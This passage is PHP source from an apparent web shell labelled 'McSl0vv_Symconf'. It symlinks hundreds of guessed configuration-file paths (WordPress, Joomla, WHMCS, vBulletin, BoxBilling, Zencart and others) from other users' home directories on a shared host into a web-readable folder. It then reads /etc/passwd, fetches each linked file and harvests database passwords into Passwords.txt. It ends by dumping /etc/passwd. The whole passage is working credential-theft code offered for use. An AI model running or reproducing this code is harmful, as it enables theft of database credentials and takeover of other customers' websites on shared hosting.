  1915. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1916. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1917. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1918. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1919. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1920. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1921. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1922. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1923. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1924. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1925. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1926. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1927. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1928. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1929. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1930. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1931. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1932. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1933. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1934. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1935. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1936. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1937. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1938. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1939. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1940. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1941. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1942. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1943. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1944. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1945. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1946. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1947. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1948. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1949. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1950. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1951. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1952. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1953. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1954. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1955. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1956. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1957. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1958. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1959. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1960. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1961. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1962. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1963. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1964. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1965. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1966. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1967. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1968. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1969. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1970. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1971. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1972. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1973. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1974. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1975. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1976. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1977. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1978. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1979. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1980. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1981. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1982. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1983. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1984.  
  1985. //Home4
  1986.  
  1987. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1988. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1989. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1990. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1991. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1992. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1993. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1994. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1995. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1996. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1997. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1998. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1999. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2000. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2001. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2002. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2003. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2004. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2005. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2006. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2007. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2008. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2009. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2010. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2011. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2012. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2013. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2014. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2015. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2016. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2017. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2018. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2019. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2020. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2021. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2022. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2023. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2024. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2025. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2026. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2027. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2028. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2029. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2030. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2031. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2032. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2033. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2034. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2035. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2036. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2037. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2038. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2039. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2040. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2041. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2042. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2043. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2044. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2045. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2046. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2047. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2048. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2049. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2050. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2051. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2052. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2053. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2054. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2055. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2056. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2057. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2058. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2059. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2060. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2061. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2062. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2063. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2064. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2065. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2066. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2067. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2068. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2069. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2070. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2071. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2072. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2073. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2074. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2075. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2076. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2077. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2078. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2079. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2080. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2081. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2082. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2083. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2084. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2085. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2086. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2087. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2088. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2089. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2090. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2091. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2092. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2093. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2094. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2095. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2096. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2097. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2098. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2099. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2100. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2101. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2102. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2103. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2104. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2105. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2106. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2107. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2108. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2109. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2110. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2111. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2112. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2113. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2114. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2115. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2116. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2117. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2118. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2119. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2120. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2121. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2122. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2123. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2124. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2125. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2126. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2127. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2128. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2129. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2130. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2131. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2132. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2133. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2134. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2135. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2136. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2137. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2138. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2139. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2140. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2141. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2142. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2143. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2144. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2145. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2146. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2147. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2148. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2149. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2150. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2151. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2152. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2153. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2154. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2155. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2156. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2157. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2158. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2159. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2160. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2161. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2162. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2163. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2164. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2165. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2166. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2167.  
  2168. }
  2169.  
  2170. //password grab
  2171.  
  2172. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2173. {
  2174.  
  2175. $ar0=explode($marqueurDebutLien, $text);
  2176. $ar1=explode($marqueurFinLien, $ar0[1]);
  2177. $ar=trim($ar1[0]);
  2178. return $ar;
  2179. }
  2180.  
  2181. $ffile=fopen('Passwords.txt','a+');
  2182.  
  2183.  
  2184. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/McSl0vv_Symconf/";
  2185. $re=$r;
  2186. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2187.  
  2188. $users=file("/etc/passwd");
  2189. foreach($users as $user)
  2190. {
  2191.  
  2192. $str=explode(":",$user);
  2193. $usersss=$str[0];
  2194. foreach($confi as $co)
  2195. {
  2196.  
  2197.  
  2198. $uurl=$re.$usersss.$co;
  2199. $uel=$uurl;
  2200.  
  2201. $ch = curl_init();
  2202.  
  2203. curl_setopt($ch, CURLOPT_URL, $uel);
  2204. curl_setopt($ch, CURLOPT_HEADER, 1);
  2205. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2206. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2207. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2208. $result['EXE'] = curl_exec($ch);
  2209. curl_close($ch);
  2210. $uxl=$result['EXE'];
  2211.  
  2212.  
  2213. if($uxl && preg_match('/table_prefix/i',$uxl))
  2214. {
  2215.  
  2216. //Wordpress
  2217.  
  2218. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2219. if(!empty($dbp))
  2220. $pass=$dbp."\n";
  2221. fwrite($ffile,$pass);
  2222.  
  2223. }
  2224. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2225. {
  2226.  
  2227. //WHMCS
  2228.  
  2229. $dbp=entre2v2($uxl,"db_password = '","';");
  2230. if(!empty($dbp))
  2231. $pass=$dbp."\n";
  2232. fwrite($ffile,$pass);
  2233.  
  2234. }
  2235.  
  2236.  
  2237. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2238. {
  2239.  
  2240. //Joomla
  2241.  
  2242. $db=entre2v2($uxl,"password = '","';");
  2243. if(!empty($db))
  2244. $pass=$db."\n";
  2245. fwrite($ffile,$pass);
  2246. }
  2247. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2248. {
  2249.  
  2250. //Vbulletin
  2251.  
  2252. $db=entre2v2($uxl,"password'] = '","';");
  2253. if(!empty($db))
  2254. $pass=$db."\n";
  2255. fwrite($ffile,$pass);
  2256.  
  2257. }
  2258. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2259. {
  2260.  
  2261. //Other
  2262.  
  2263. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2264. if(!empty($db))
  2265. $pass=$db."\n";
  2266. fwrite($ffile,$pass);
  2267. }
  2268. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2269. {
  2270.  
  2271. //Other
  2272.  
  2273. $db=entre2v2($uxl,"dbpass = '","';");
  2274. if(!empty($db))
  2275. $pass=$db."\n";
  2276. fwrite($ffile,$pass);
  2277. }
  2278. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2279. {
  2280.  
  2281. //Other
  2282.  
  2283. $db=entre2v2($uxl,"dbpass = '","';");
  2284. if(!empty($db))
  2285. $pass=$db."\n";
  2286. fwrite($ffile,$pass);
  2287.  
  2288. }
  2289. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2290. {
  2291.  
  2292. //Other
  2293.  
  2294. $db=entre2v2($uxl,"dbpass = \"","\";");
  2295. if(!empty($db))
  2296. $pass=$db."\n";
  2297. fwrite($ffile,$pass);
  2298. }
  2299.  
  2300.  
  2301. }
  2302. }
  2303. echo "<center>
  2304. <a href=\"McSl0vv_Symconf/root/\">Root Server</a>
  2305. <br><a href=\"McSl0vv_Symconf/Passwords.txt\">Passwords</a>
  2306. <br><a href=\"McSl0vv_Symconf/\">Configurations</a></center>";
  2307. }
  2308. else
  2309. {
  2310. echo "<center>
  2311. <form method=\"POST\">
  2312. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2313. $file = '/etc/passwd';
  2314. $read = @fopen($file, 'r');
  2315. if ($read){
  2316. $body = @fread($read, @filesize($file));
  2317. echo "".htmlentities($body)."";
  2318. }
  2319. elseif(!$read)
  2320. {
  2321. $read = @show_source($file) ;
  2322. }
  2323. elseif(!$read)
  2324. {
  2325. $read = @highlight_file($file);
  2326. }
  2327. elseif(!$read)
  2328. {
  2329. for($uid=0;$uid<1000;$uid++)
  2330. {
  2331. $ara = posix_getpwuid($uid);
  2332. if (!empty($ara))
  2333. {
  2334. while (list ($key, $val) = each($ara))
  2335. {
  2336. print "$val:";
